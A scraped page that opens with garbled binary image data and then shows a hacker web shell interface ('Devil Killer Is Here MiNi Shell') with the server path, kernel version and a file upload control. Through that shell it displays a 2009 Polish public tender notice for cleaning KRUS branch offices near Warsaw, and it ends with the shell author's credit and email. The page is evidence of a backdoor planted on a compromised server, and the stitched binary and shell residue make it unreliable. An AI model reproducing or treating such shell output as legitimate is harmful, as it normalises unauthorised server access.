JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090526/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090526/166558-N-2009.html

<p class="kh_header"><b>Warszawa: Usługa sprzątania pomieszczeń biurowych oraz terenów zewnętrznych w podległych Oddziałowi Regionalnemu Kasy Rolniczego Ubezpieczenia Społecznego w Warszawie, Placówkach Terenowych.</b><br>
<b>Numer ogłoszenia: 166558 - 2009; data zamieszczenia: 26.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kasa Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Warszawie , ul. Mińska 25, 03-808 Warszawa, woj. mazowieckie, tel. 022 8103006, faks 022 8104688.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krus.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa sprzątania pomieszczeń biurowych oraz terenów zewnętrznych w podległych Oddziałowi Regionalnemu Kasy Rolniczego Ubezpieczenia Społecznego w Warszawie, Placówkach Terenowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie usług sprzątania pomieszczeń biurowych oraz terenów zewnętrznych w podległych Oddziałowi Regionalnemu Kasy Rolniczego Ubezpieczenia Społecznego w Warszawie, Placówkach Terenowych w Garwolinie, Żyrardowie, Siedlcach, Płocku, Sierpcu, Wyszogrodzie oraz tylko usług sprzątania pomieszczeń biurowych w Gostyninie i Sochaczewie.
2.Zakres usług i czynności dotyczących utrzymania czystości i porządku w pomieszczeniach biurowych w  podległych Placówkach Terenowych  oraz bezpośrednim otoczeniu zewnętrznym siedzib podległych Placówek Terenowych  obejmuje w szczególności:
a)codzienne odkurzanie wykładzin, podłóg, dywanów i tapicerek;
b)codzienne odkurzanie i czyszczenie biurek, szafek, półek i innych mebli, parapetów, opróżnianie koszy na śmieci i niszczarek w poszczególnych pomieszczeniach ;
c)codzienne zamiatanie, mycie podłóg i klatek schodowych;
d)codzienne mycie, czyszczenie i dezynfekcja urządzeń sanitarnych środkami chemicznymi i bakteriobójczymi ( muszle klozetowe, umywalki, baterie umywalkowe);
e)co najmniej 1 x w tygodniu mycie gablot i drzwi przeszklonych, drzwi i framug;
f)co najmniej 1 x w tygodniu mycie glazury i luster w pomieszczeniach sanitarnych;
g)co najmniej 1 x na 10 dni pastowanie i froterowanie podłóg i schodów;
h)bieżące czyszczenie mebli i konserwacja pomieszczeń socjalnych;
i)codzienne zamiatanie tarasów, schodów zewnętrznych i co najmniej 1 x w tygodniu ich mycie;
j)co najmniej 1 x w miesiącu mycie i czyszczenie żyrandoli i kloszy w pomieszczeniach  podległych PT;
k)co najmniej 1 x w miesiącu w godzinach pracy od godziny 8.00 do godziny 15.00 sprzątanie pomieszczeń magazynowych; 
l)co najmniej 1 x w miesiącu czyszczenie lub mycie rolet, żaluzji w pomieszczeniach  podległych PT;
m)bieżące usuwanie zabrudzeń ze ścian i sufitów
n)co najmniej 1 x w roku mycie okien ( szyby, ramy i parapety )
o)bieżące utrzymanie czystości i porządku w nie zagospodarowanej części piwnic i strychu, szczególnie z uwzględnieniem wymagań p.poż. dla tych pomieszczeń;
p)utrzymywanie porządku  w czasie ewentualnych remontów i większych napraw; 
q)stałe utrzymanie w należytym stanie dojścia do budynków, parkingów i chodników (zamiatanie), a w okresie jesienno - zimowym na bieżąco usuwanie opadłych liści, odśnieżanie , utrzymywanie w czystości wejścia ( schody );
r)w razie potrzeby w okresie od listopada  odśnieżanie dachu i usuwanie sopli;
s)należy zabezpieczyć wszelkie niezbędne środki higieny: papier toaletowy, mydło w płynie, ręczniki papierowe, środki zapachowe, środki dezynfekcyjne, worki na śmieci, zapewnienie soli i piasku niezbędnych do zimowego utrzymania terenów zewnętrznych i inne konieczne do funkcjonowania jednostki;
3.Pozostałe wymagania odnośnie przedmiotu zamówienia:
a)Zamawiający zastrzega sobie stabilność 2 pracowników Wykonawcy obsługujących obiekt w Placówkach Terenowych w Siedlcach, Płocku i Żyrardowie, a w Placówkach Terenowych w Garwolinie, Gostyninie, Sierpcu, Wyszogrodzie i Sochaczewie 1 pracownika. 
4.Zestawienie powierzchni, które objęte są zakresem zamówienia:
PT GARWOLIN:
1.Powierzchnia ogólna budynku  - 892m2
2.Powierzchnia ogólna terenów zewnętrznych - 1200m2
PT ŻYRARDÓW:
1.Powierzchnia ogólna budynku  - 1135m2 
2.Powierzchnia ogólna terenów zewnętrznych  - 2473m2
PT SOCHACZEW:
1.Powierzchnia ogólna budynku  - 281m2 
PT SIEDLCE:
3.Powierzchnia ogólna budynku  - 1854m2
4.Powierzchnia ogólna terenów zewnętrznych  - 3118m2
PT PŁOCK:
1.Powierzchnia ogólna budynku  - 1463,2m2
2.Powierzchnia ogólna terenów zewnętrznych  - 1211m2
PT SIERPC:
1.Powierzchnia ogólna budynku  - 355,20m2 
2.Powierzchnia ogólna terenów zewnętrznych  - 115,31m2
PT GOSTYNIN:
1.Powierzchnia ogólna budynku  - 370,40m2 
PT WYSZOGRÓD:
1.Powierzchnia ogólna budynku  - 170,80m2
2.Powierzchnia ogólna terenów zewnętrznych  - 96m2.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-4, 90.61.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają wymogi określone w art. 22 ust. 1 pkt 1 - 4 ustawy - Pzp tj.:
1.posiadają uprawnienie do wykonania określonej działalności lub czynności (warunek ten potwierdzą dokumentami wymienionymi w pkt VII ppkt 1,2,3,4,5 lub 6 i 7),
2.posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, warunek ten Zamawiający uzna za spełniony, w przypadku gdy Wykonawca w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub jest w trakcie wykonywania co najmniej dwóch usług stanowiących przedmiot zamówienia (warunek ten potwierdzą dokumentami wymienionymi w pkt VII ppkt 8 , 9, 10,  ),
3.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Oferta powinna zawierać następujące oświadczenia i dokumenty:
1.Oświadczenie Wykonawcy, że spełnia wymogi art. 22 ust. 1 oraz, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy - Prawo zamówień publicznych (wg wzoru stanowiącego  załącznik nr 3 do SIWZ),
2.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3.Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego oraz właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania  ofert,
4.Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
5.Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art.24 ust.1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
6.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium RP, zamiast dokumentów, o których mowa w pkt 2,3 i 5, - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
a)nie otwarto jego likwidacji, ani nie ogłoszono upadłości, tak w celu likwidacji jego majątku, jak również w celu zawarcia układu z wierzycielami - wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert,
b)nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 m-ce przed upływem terminu składania ofert,
c)nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawione nie wcześniej niż 6 m-cy przed upływem terminu składania ofert.
7.Jeżeli w kraju pochodzenia osoby lub w kraju, w którym  Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 6 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania; wymagania dotyczące okresu ważności tego dokumentu określone w pkt 6 stosuje się odpowiednio,
8.Wykaz wykonanych lub wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usłudze stanowiącej przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonywania i odbiorców oraz załączą dokumenty potwierdzające, że usługi zostały wykonane należycie (wg wzoru stanowiącego Załącznik nr 2 do SIWZ),
9.W przypadku wystąpienia okoliczności o których mowa w art. 22 ust 1 pkt 2 ustawy PZP, - pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
Ponadto oferta powinna zawierać następujące oświadczenia i dokumenty:
10.Wypełniony - Formularz Oferty wg wzoru stanowiącego Załącznik nr 1 do SIWZ,
  11.  Oświadczenie Wykonawcy wskazujące, którą część zamówienia powierzy wykonaniu przez                                    podwykonawców, zgodnie z art. 36 ust. 4 ustawy - PZP (Formularz Oferty - pkt 8),
  12.   Zaakceptowany i podpisany przez Wykonawcę wzór umowy- załącznik nr 5 do SIWZ
  13. Oryginał lub kopię poświadczoną za zgodność z oryginałem przez notariusza - pełnomocnictwa /upoważnienia/ do reprezentowania Wykonawcy w niniejszym postępowaniu, o ile oferta została podpisana przez osoby nie umocowane do tych czynności w dokumentach rejestracyjnych firmy,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.krus.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kasa Rolniczego ubezpieczenia Społecznego Oddział Regionalny ul. Mińska 25 03-808, I piętro pok.113.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.06.2009 godzina 11:00, miejsce: Kasa Rolniczego Ubezpieczenia Społecznego Oddział Regionalny ul. Mińska 25 03-808, III piętro, pok.305.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Placówka Terenowa w Garwolinie..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa sprzątania pomieszczeń biurowych oraz terenów zewnętrznych w Placówce Terenowej w Garwolinie..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-4, 90.61.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Placówki Terenowe w Żyrardowie i Sochaczewie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa sprzątania pomieszczeń biurowych oraz terenów zewnętrznych w Placówce Terenowej w Żyrardowie i tylko sprzątania pomieszczeń biurowych w Sochaczewie..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-4, 90.61.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Placówka Terenowa w Siedlcach..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa sprzątania pomieszczeń biurowych oraz terenów zewnętrznych w Placówce Terenowej w Siedlcach..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-4, 90.61.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Placówki Terenowe w Płocku, Sierpcu, Wyszogrodzie i Gostyninie..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usługa sprzątania pomieszczeń biurowych oraz terenów zewnętrznych w Placówce Terenowej w Płocku, Sierpcu, Wyszogrodzie i tylko sprzątania pomieszczeń biurowych w Gostyninie..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.91.92.00-4, 90.61.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com